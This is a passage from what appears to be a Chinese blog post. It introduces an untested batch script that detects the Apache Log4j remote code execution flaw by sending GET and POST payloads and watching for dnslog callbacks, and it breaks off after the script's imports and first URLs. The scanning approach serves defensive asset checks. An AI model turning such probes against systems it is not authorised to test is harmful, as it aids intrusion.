Apache Log4j任意代码执行高危漏洞远程批量检测脚本(脚本为初版,未经过测试)
连续工作了十二天,本来想着周五能轻松一点,结果来了这个漏洞,要检测一大批资产,看了一下复现方法,然后写了个脚本检测,利用dnslog回显检测,不过只是单纯post和get payload而已。然后,,,扫不出来,只能手工了。后续有环境在修改,读者也可自行修改,循环遍历一下参数字典。import requestsfrom urllib.parse import quoteurl="http://dnslog.cn/getdomain.php"url1="http://
